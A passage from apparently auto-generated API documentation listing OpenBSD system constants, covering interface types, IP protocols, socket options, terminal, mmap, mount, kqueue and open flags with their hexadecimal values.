= 0x11 constant IFT_SDSL (line 766) | IFT_SDSL = 0x60 constant IFT_SHDSL (line 767) | IFT_SHDSL = 0xa9 constant IFT_SIP (line 768) | IFT_SIP = 0x1f constant IFT_SIPSIG (line 769) | IFT_SIPSIG = 0xcc constant IFT_SIPTG (line 770) | IFT_SIPTG = 0xcb constant IFT_SLIP (line 771) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 772) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 773) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 774) | IFT_SONET = 0x27 constant IFT_SONETOVERHEADCHANNEL (line 775) | IFT_SONETOVERHEADCHANNEL = 0xb9 constant IFT_SONETPATH (line 776) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 777) | IFT_SONETVT = 0x33 constant IFT_SRP (line 778) | IFT_SRP = 0x97 constant IFT_SS7SIGLINK (line 779) | IFT_SS7SIGLINK = 0x9c constant IFT_STACKTOSTACK (line 780) | IFT_STACKTOSTACK = 0x6f constant IFT_STARLAN (line 781) | IFT_STARLAN = 0xb constant IFT_T1 (line 782) | IFT_T1 = 0x12 constant IFT_TDLC (line 783) | IFT_TDLC = 0x74 constant IFT_TELINK (line 784) | IFT_TELINK = 0xc8 constant IFT_TERMPAD (line 785) | IFT_TERMPAD = 0x5b constant IFT_TR008 (line 786) | IFT_TR008 = 0xb0 constant IFT_TRANSPHDLC (line 787) | IFT_TRANSPHDLC = 0x7b constant IFT_TUNNEL (line 788) | IFT_TUNNEL = 0x83 constant IFT_ULTRA (line 789) | IFT_ULTRA = 0x1d constant IFT_USB (line 790) | IFT_USB = 0xa0 constant IFT_V11 (line 791) | IFT_V11 = 0x40 constant IFT_V35 (line 792) | IFT_V35 = 0x2d constant IFT_V36 (line 793) | IFT_V36 = 0x41 constant IFT_V37 (line 794) | IFT_V37 = 0x78 constant IFT_VDSL (line 795) | IFT_VDSL = 0x61 constant IFT_VIRTUALIPADDRESS (line 796) | IFT_VIRTUALIPADDRESS = 0x70 constant IFT_VIRTUALTG (line 797) | IFT_VIRTUALTG = 0xca constant IFT_VOICEDID (line 798) | IFT_VOICEDID = 0xd5 constant IFT_VOICEEM (line 799) | IFT_VOICEEM = 0x64 constant IFT_VOICEEMFGD (line 800) | IFT_VOICEEMFGD = 0xd3 constant IFT_VOICEENCAP (line 801) | IFT_VOICEENCAP = 0x67 constant IFT_VOICEFGDEANA (line 802) | IFT_VOICEFGDEANA = 0xd4 constant IFT_VOICEFXO (line 803) | IFT_VOICEFXO = 0x65 constant IFT_VOICEFXS (line 804) | IFT_VOICEFXS = 0x66 constant IFT_VOICEOVERATM (line 805) | IFT_VOICEOVERATM = 0x98 constant IFT_VOICEOVERCABLE (line 806) | IFT_VOICEOVERCABLE = 0xc6 constant IFT_VOICEOVERFRAMERELAY (line 807) | IFT_VOICEOVERFRAMERELAY = 0x99 constant IFT_VOICEOVERIP (line 808) | IFT_VOICEOVERIP = 0x68 constant IFT_WIREGUARD (line 809) | IFT_WIREGUARD = 0xfb constant IFT_X213 (line 810) | IFT_X213 = 0x5d constant IFT_X25 (line 811) | IFT_X25 = 0x5 constant IFT_X25DDN (line 812) | IFT_X25DDN = 0x4 constant IFT_X25HUNTGROUP (line 813) | IFT_X25HUNTGROUP = 0x7a constant IFT_X25MLP (line 814) | IFT_X25MLP = 0x79 constant IFT_X25PLE (line 815) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 816) | IFT_XETHER = 0x1a constant IGNBRK (line 817) | IGNBRK = 0x1 constant IGNCR (line 818) | IGNCR = 0x80 constant IGNPAR (line 819) | IGNPAR = 0x4 constant IMAXBEL (line 820) | IMAXBEL = 0x2000 constant INLCR (line 821) | INLCR = 0x40 constant INPCK (line 822) | INPCK = 0x10 constant IN_CLASSA_HOST (line 823) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 824) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 825) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 826) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 827) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 828) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 829) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 830) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 831) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 832) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 833) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 834) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 835) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 836) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 837) | IN_LOOPBACKNET = 0x7f constant IN_RFC3021_HOST (line 838) | IN_RFC3021_HOST = 0x1 constant IN_RFC3021_NET (line 839) | IN_RFC3021_NET = 0xfffffffe constant IN_RFC3021_NSHIFT (line 840) | IN_RFC3021_NSHIFT = 0x1f constant IPPROTO_AH (line 841) | IPPROTO_AH = 0x33 constant IPPROTO_CARP (line 842) | IPPROTO_CARP = 0x70 constant IPPROTO_DIVERT (line 843) | IPPROTO_DIVERT = 0x102 constant IPPROTO_DONE (line 844) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 845) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 846) | IPPROTO_EGP = 0x8 constant IPPROTO_ENCAP (line 847) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 848) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 849) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 850) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 851) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 852) | IPPROTO_GGP = 0x3 constant IPPROTO_GRE (line 853) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 854) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 855) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 856) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 857) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 858) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 859) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 860) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPIP (line 861) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV4 (line 862) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 863) | IPPROTO_IPV6 = 0x29 constant IPPROTO_MAX (line 864) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 865) | IPPROTO_MAXID = 0x103 constant IPPROTO_MOBILE (line 866) | IPPROTO_MOBILE = 0x37 constant IPPROTO_MPLS (line 867) | IPPROTO_MPLS = 0x89 constant IPPROTO_NONE (line 868) | IPPROTO_NONE = 0x3b constant IPPROTO_PFSYNC (line 869) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PIM (line 870) | IPPROTO_PIM = 0x67 constant IPPROTO_PUP (line 871) | IPPROTO_PUP = 0xc constant IPPROTO_RAW (line 872) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 873) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 874) | IPPROTO_RSVP = 0x2e constant IPPROTO_SCTP (line 875) | IPPROTO_SCTP = 0x84 constant IPPROTO_TCP (line 876) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 877) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 878) | IPPROTO_UDP = 0x11 constant IPPROTO_UDPLITE (line 879) | IPPROTO_UDPLITE = 0x88 constant IPV6_AUTH_LEVEL (line 880) | IPV6_AUTH_LEVEL = 0x35 constant IPV6_AUTOFLOWLABEL (line 881) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_CHECKSUM (line 882) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 883) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 884) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 885) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 886) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 887) | IPV6_DSTOPTS = 0x32 constant IPV6_ESP_NETWORK_LEVEL (line 888) | IPV6_ESP_NETWORK_LEVEL = 0x37 constant IPV6_ESP_TRANS_LEVEL (line 889) | IPV6_ESP_TRANS_LEVEL = 0x36 constant IPV6_FAITH (line 890) | IPV6_FAITH = 0x1d constant IPV6_FLOWINFO_MASK (line 891) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_MASK (line 892) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FRAGTTL (line 893) | IPV6_FRAGTTL = 0x78 constant IPV6_HLIMDEC (line 894) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 895) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 896) | IPV6_HOPOPTS = 0x31 constant IPV6_IPCOMP_LEVEL (line 897) | IPV6_IPCOMP_LEVEL = 0x3c constant IPV6_JOIN_GROUP (line 898) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 899) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 900) | IPV6_MAXHLIM = 0xff constant IPV6_MAXPACKET (line 901) | IPV6_MAXPACKET = 0xffff constant IPV6_MINHOPCOUNT (line 902) | IPV6_MINHOPCOUNT = 0x41 constant IPV6_MMTU (line 903) | IPV6_MMTU = 0x500 constant IPV6_MULTICAST_HOPS (line 904) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 905) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 906) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 907) | IPV6_NEXTHOP = 0x30 constant IPV6_OPTIONS (line 908) | IPV6_OPTIONS = 0x1 constant IPV6_PATHMTU (line 909) | IPV6_PATHMTU = 0x2c constant IPV6_PIPEX (line 910) | IPV6_PIPEX = 0x3f constant IPV6_PKTINFO (line 911) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 912) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 913) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 914) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 915) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_RECVDSTOPTS (line 916) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVDSTPORT (line 917) | IPV6_RECVDSTPORT = 0x40 constant IPV6_RECVHOPLIMIT (line 918) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 919) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 920) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 921) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRTHDR (line 922) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 923) | IPV6_RECVTCLASS = 0x39 constant IPV6_RTABLE (line 924) | IPV6_RTABLE = 0x1021 constant IPV6_RTHDR (line 925) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 926) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 927) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 928) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 929) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 930) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 931) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 932) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 933) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 934) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 935) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 936) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 937) | IP_ADD_MEMBERSHIP = 0xc constant IP_AUTH_LEVEL (line 938) | IP_AUTH_LEVEL = 0x14 constant IP_DEFAULT_MULTICAST_LOOP (line 939) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 940) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 941) | IP_DF = 0x4000 constant IP_DROP_MEMBERSHIP (line 942) | IP_DROP_MEMBERSHIP = 0xd constant IP_ESP_NETWORK_LEVEL (line 943) | IP_ESP_NETWORK_LEVEL = 0x16 constant IP_ESP_TRANS_LEVEL (line 944) | IP_ESP_TRANS_LEVEL = 0x15 constant IP_HDRINCL (line 945) | IP_HDRINCL = 0x2 constant IP_IPCOMP_LEVEL (line 946) | IP_IPCOMP_LEVEL = 0x1d constant IP_IPDEFTTL (line 947) | IP_IPDEFTTL = 0x25 constant IP_IPSECFLOWINFO (line 948) | IP_IPSECFLOWINFO = 0x24 constant IP_IPSEC_LOCAL_AUTH (line 949) | IP_IPSEC_LOCAL_AUTH = 0x1b constant IP_IPSEC_LOCAL_CRED (line 950) | IP_IPSEC_LOCAL_CRED = 0x19 constant IP_IPSEC_LOCAL_ID (line 951) | IP_IPSEC_LOCAL_ID = 0x17 constant IP_IPSEC_REMOTE_AUTH (line 952) | IP_IPSEC_REMOTE_AUTH = 0x1c constant IP_IPSEC_REMOTE_CRED (line 953) | IP_IPSEC_REMOTE_CRED = 0x1a constant IP_IPSEC_REMOTE_ID (line 954) | IP_IPSEC_REMOTE_ID = 0x18 constant IP_MAXPACKET (line 955) | IP_MAXPACKET = 0xffff constant IP_MAX_MEMBERSHIPS (line 956) | IP_MAX_MEMBERSHIPS = 0xfff constant IP_MF (line 957) | IP_MF = 0x2000 constant IP_MINTTL (line 958) | IP_MINTTL = 0x20 constant IP_MIN_MEMBERSHIPS (line 959) | IP_MIN_MEMBERSHIPS = 0xf constant IP_MSS (line 960) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 961) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 962) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 963) | IP_MULTICAST_TTL = 0xa constant IP_OFFMASK (line 964) | IP_OFFMASK = 0x1fff constant IP_OPTIONS (line 965) | IP_OPTIONS = 0x1 constant IP_PIPEX (line 966) | IP_PIPEX = 0x22 constant IP_PORTRANGE (line 967) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 968) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 969) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 970) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 971) | IP_RECVDSTADDR = 0x7 constant IP_RECVDSTPORT (line 972) | IP_RECVDSTPORT = 0x21 constant IP_RECVIF (line 973) | IP_RECVIF = 0x1e constant IP_RECVOPTS (line 974) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 975) | IP_RECVRETOPTS = 0x6 constant IP_RECVRTABLE (line 976) | IP_RECVRTABLE = 0x23 constant IP_RECVTTL (line 977) | IP_RECVTTL = 0x1f constant IP_RETOPTS (line 978) | IP_RETOPTS = 0x8 constant IP_RF (line 979) | IP_RF = 0x8000 constant IP_RTABLE (line 980) | IP_RTABLE = 0x1021 constant IP_SENDSRCADDR (line 981) | IP_SENDSRCADDR = 0x7 constant IP_TOS (line 982) | IP_TOS = 0x3 constant IP_TTL (line 983) | IP_TTL = 0x4 constant ISIG (line 984) | ISIG = 0x80 constant ISTRIP (line 985) | ISTRIP = 0x20 constant ITIMER_PROF (line 986) | ITIMER_PROF = 0x2 constant ITIMER_REAL (line 987) | ITIMER_REAL = 0x0 constant ITIMER_VIRTUAL (line 988) | ITIMER_VIRTUAL = 0x1 constant IUCLC (line 989) | IUCLC = 0x1000 constant IXANY (line 990) | IXANY = 0x800 constant IXOFF (line 991) | IXOFF = 0x400 constant IXON (line 992) | IXON = 0x200 constant KERN_HOSTNAME (line 993) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 994) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 995) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 996) | KERN_VERSION = 0x4 constant LCNT_OVERLOAD_FLUSH (line 997) | LCNT_OVERLOAD_FLUSH = 0x6 constant LOCK_EX (line 998) | LOCK_EX = 0x2 constant LOCK_NB (line 999) | LOCK_NB = 0x4 constant LOCK_SH (line 1000) | LOCK_SH = 0x1 constant LOCK_UN (line 1001) | LOCK_UN = 0x8 constant MADV_DONTNEED (line 1002) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 1003) | MADV_FREE = 0x6 constant MADV_NORMAL (line 1004) | MADV_NORMAL = 0x0 constant MADV_RANDOM (line 1005) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 1006) | MADV_SEQUENTIAL = 0x2 constant MADV_SPACEAVAIL (line 1007) | MADV_SPACEAVAIL = 0x5 constant MADV_WILLNEED (line 1008) | MADV_WILLNEED = 0x3 constant MAP_ANON (line 1009) | MAP_ANON = 0x1000 constant MAP_ANONYMOUS (line 1010) | MAP_ANONYMOUS = 0x1000 constant MAP_CONCEAL (line 1011) | MAP_CONCEAL = 0x8000 constant MAP_COPY (line 1012) | MAP_COPY = 0x2 constant MAP_FILE (line 1013) | MAP_FILE = 0x0 constant MAP_FIXED (line 1014) | MAP_FIXED = 0x10 constant MAP_FLAGMASK (line 1015) | MAP_FLAGMASK = 0xfff7 constant MAP_HASSEMAPHORE (line 1016) | MAP_HASSEMAPHORE = 0x0 constant MAP_INHERIT (line 1017) | MAP_INHERIT = 0x0 constant MAP_INHERIT_COPY (line 1018) | MAP_INHERIT_COPY = 0x1 constant MAP_INHERIT_NONE (line 1019) | MAP_INHERIT_NONE = 0x2 constant MAP_INHERIT_SHARE (line 1020) | MAP_INHERIT_SHARE = 0x0 constant MAP_INHERIT_ZERO (line 1021) | MAP_INHERIT_ZERO = 0x3 constant MAP_NOEXTEND (line 1022) | MAP_NOEXTEND = 0x0 constant MAP_NORESERVE (line 1023) | MAP_NORESERVE = 0x0 constant MAP_PRIVATE (line 1024) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 1025) | MAP_RENAME = 0x0 constant MAP_SHARED (line 1026) | MAP_SHARED = 0x1 constant MAP_STACK (line 1027) | MAP_STACK = 0x4000 constant MAP_TRYFIXED (line 1028) | MAP_TRYFIXED = 0x0 constant MCL_CURRENT (line 1029) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1030) | MCL_FUTURE = 0x2 constant MNT_ASYNC (line 1031) | MNT_ASYNC = 0x40 constant MNT_DEFEXPORTED (line 1032) | MNT_DEFEXPORTED = 0x200 constant MNT_DELEXPORT (line 1033) | MNT_DELEXPORT = 0x20000 constant MNT_DOOMED (line 1034) | MNT_DOOMED = 0x8000000 constant MNT_EXPORTANON (line 1035) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1036) | MNT_EXPORTED = 0x100 constant MNT_EXRDONLY (line 1037) | MNT_EXRDONLY = 0x80 constant MNT_FORCE (line 1038) | MNT_FORCE = 0x80000 constant MNT_LAZY (line 1039) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1040) | MNT_LOCAL = 0x1000 constant MNT_NOATIME (line 1041) | MNT_NOATIME = 0x8000 constant MNT_NODEV (line 1042) | MNT_NODEV = 0x10 constant MNT_NOEXEC (line 1043) | MNT_NOEXEC = 0x4 constant MNT_NOPERM (line 1044) | MNT_NOPERM = 0x20 constant MNT_NOSUID (line 1045) | MNT_NOSUID = 0x8 constant MNT_NOWAIT (line 1046) | MNT_NOWAIT = 0x2 constant MNT_QUOTA (line 1047) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1048) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1049) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1050) | MNT_ROOTFS = 0x4000 constant MNT_SOFTDEP (line 1051) | MNT_SOFTDEP = 0x4000000 constant MNT_STALLED (line 1052) | MNT_STALLED = 0x100000 constant MNT_SWAPPABLE (line 1053) | MNT_SWAPPABLE = 0x200000 constant MNT_SYNCHRONOUS (line 1054) | MNT_SYNCHRONOUS = 0x2 constant MNT_UPDATE (line 1055) | MNT_UPDATE = 0x10000 constant MNT_VISFLAGMASK (line 1056) | MNT_VISFLAGMASK = 0x400ffff constant MNT_WAIT (line 1057) | MNT_WAIT = 0x1 constant MNT_WANTRDWR (line 1058) | MNT_WANTRDWR = 0x2000000 constant MNT_WXALLOWED (line 1059) | MNT_WXALLOWED = 0x800 constant MOUNT_AFS (line 1060) | MOUNT_AFS = "afs" constant MOUNT_CD9660 (line 1061) | MOUNT_CD9660 = "cd9660" constant MOUNT_EXT2FS (line 1062) | MOUNT_EXT2FS = "ext2fs" constant MOUNT_FFS (line 1063) | MOUNT_FFS = "ffs" constant MOUNT_FUSEFS (line 1064) | MOUNT_FUSEFS = "fuse" constant MOUNT_MFS (line 1065) | MOUNT_MFS = "mfs" constant MOUNT_MSDOS (line 1066) | MOUNT_MSDOS = "msdos" constant MOUNT_NCPFS (line 1067) | MOUNT_NCPFS = "ncpfs" constant MOUNT_NFS (line 1068) | MOUNT_NFS = "nfs" constant MOUNT_NTFS (line 1069) | MOUNT_NTFS = "ntfs" constant MOUNT_TMPFS (line 1070) | MOUNT_TMPFS = "tmpfs" constant MOUNT_UDF (line 1071) | MOUNT_UDF = "udf" constant MOUNT_UFS (line 1072) | MOUNT_UFS = "ffs" constant MSG_BCAST (line 1073) | MSG_BCAST = 0x100 constant MSG_CMSG_CLOEXEC (line 1074) | MSG_CMSG_CLOEXEC = 0x800 constant MSG_CTRUNC (line 1075) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1076) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1077) | MSG_DONTWAIT = 0x80 constant MSG_EOR (line 1078) | MSG_EOR = 0x8 constant MSG_MCAST (line 1079) | MSG_MCAST = 0x200 constant MSG_NOSIGNAL (line 1080) | MSG_NOSIGNAL = 0x400 constant MSG_OOB (line 1081) | MSG_OOB = 0x1 constant MSG_PEEK (line 1082) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1083) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1084) | MSG_WAITALL = 0x40 constant MS_ASYNC (line 1085) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1086) | MS_INVALIDATE = 0x4 constant MS_SYNC (line 1087) | MS_SYNC = 0x2 constant NAME_MAX (line 1088) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1089) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1090) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1091) | NET_RT_IFLIST = 0x3 constant NET_RT_IFNAMES (line 1092) | NET_RT_IFNAMES = 0x6 constant NET_RT_MAXID (line 1093) | NET_RT_MAXID = 0x8 constant NET_RT_SOURCE (line 1094) | NET_RT_SOURCE = 0x7 constant NET_RT_STATS (line 1095) | NET_RT_STATS = 0x4 constant NET_RT_TABLE (line 1096) | NET_RT_TABLE = 0x5 constant NFDBITS (line 1097) | NFDBITS = 0x20 constant NOFLSH (line 1098) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1099) | NOKERNINFO = 0x2000000 constant NOTE_ATTRIB (line 1100) | NOTE_ATTRIB = 0x8 constant NOTE_CHANGE (line 1101) | NOTE_CHANGE = 0x1 constant NOTE_CHILD (line 1102) | NOTE_CHILD = 0x4 constant NOTE_DELETE (line 1103) | NOTE_DELETE = 0x1 constant NOTE_EOF (line 1104) | NOTE_EOF = 0x2 constant NOTE_EXEC (line 1105) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1106) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1107) | NOTE_EXTEND = 0x4 constant NOTE_FORK (line 1108) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1109) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1110) | NOTE_LOWAT = 0x1 constant NOTE_OOB (line 1111) | NOTE_OOB = 0x4 constant NOTE_PCTRLMASK (line 1112) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1113) | NOTE_PDATAMASK = 0xfffff constant NOTE_RENAME (line 1114) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1115) | NOTE_REVOKE = 0x40 constant NOTE_TRACK (line 1116) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1117) | NOTE_TRACKERR = 0x2 constant NOTE_TRUNCATE (line 1118) | NOTE_TRUNCATE = 0x80 constant NOTE_WRITE (line 1119) | NOTE_WRITE = 0x2 constant OCRNL (line 1120) | OCRNL = 0x10 constant OLCUC (line 1121) | OLCUC = 0x20 constant ONLCR (line 1122) | ONLCR = 0x2 constant ONLRET (line 1123) | ONLRET = 0x80 constant ONOCR (line 1124) | ONOCR = 0x40 constant ONOEOT (line 1125) | ONOEOT = 0x8 constant OPOST (line 1126) | OPOST = 0x1 constant OXTABS (line 1127) | OXTABS = 0x4 constant O_ACCMODE (line 1128) | O_ACCMODE = 0x3 constant O_APPEND (line 1129) | O_APPEND = 0x8 constant O_ASYNC (line 1130) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1131) | O_CLOEXEC = 0x10000 constant O_CREAT (line 1132) | O_CREAT = 0x200 constant O_DIRECTORY (line 1133) | O_DIRECTORY = 0x20000 constant O_DSYNC (line 1134) | O_DSYNC = 0x80 constant O_EXCL (line 1135) | O_EXCL = 0x800 constant O_EXLOCK (line 1136) | O_EXLOCK = 0x20 constant O_FSYNC (line 1137) | O_FSYNC = 0x80 constant O_NDELAY (line 1138) | O_NDELAY = 0x4 constant O_NOCTTY (line 1139) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1140) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1141) | O_NONBLOCK = 0x4 constant O_RDONLY (line 1142) | O_RDONLY = 0x0 constant O_RDWR (line 1143) | O_RDWR = 0x2 constant O_RSYNC (line 1144) | O_RSYNC = 0x80 constant O_SHLOCK (line 1145) | O_SHLOCK = 0x10 constant O_SYNC (line 1146) | O_SYNC = 0x80 constant O_TRUNC (line 1147) | O_TRUNC = 0x400 constant O_WRONLY (line 1148) | O_WRONLY = 0x1 constant PARENB (line 1149) | PARENB = 0x1000 constant PARMRK (line 1150) | PARMRK = 0x8 constant PARODD (line 1151) | PARODD = 0x2000 constant PENDIN (line 1152) | PENDIN = 0x20000000 constant PF_FLUSH (line 1153) | PF_FLUSH = 0x1 constant PRIO_PGRP (line 1154) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1155) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1156) | PRIO_USER = 0x2 constant PROT_EXEC (line 1157) | PROT_EXEC = 0x4 constant PROT_NONE (line 1158) | PROT_NONE = 0x0 constant PROT_READ (line 1159) | PROT_READ = 0x1 constant PROT_WRITE (line 1160) | PROT_WRITE = 0x2 constant RLIMIT_CORE (line 1161) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1162) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1163) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1164) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1165) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1166) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1167) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1168) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1169) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1170) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1171) | RTAX_AUTHOR = 0x6 constant RTAX_BFD (line 1172) | RTAX_BFD = 0xb constant RTAX_BRD (line 1173) | RTAX_BRD = 0x7 constant RTAX_DNS (line 1174) | RTAX_DNS = 0xc constant RTAX_DST (line 1175) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1176) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1177) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1178) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1179) | RTAX_IFP = 0x4 constant RTAX_LABEL (line 1180) | RTAX_LABEL = 0xa constant RTAX_MAX (line 1181) | RTAX_MAX = 0xf constant RTAX_NETMASK (line 1182) | RTAX_NETMASK = 0x2 constant RTAX_SEARCH (line 1183) | RTAX_SEARCH = 0xe constant RTAX_SRC (line 1184) | RTAX_SRC = 0x8 constant RTAX_SRCMASK (line 1185) | 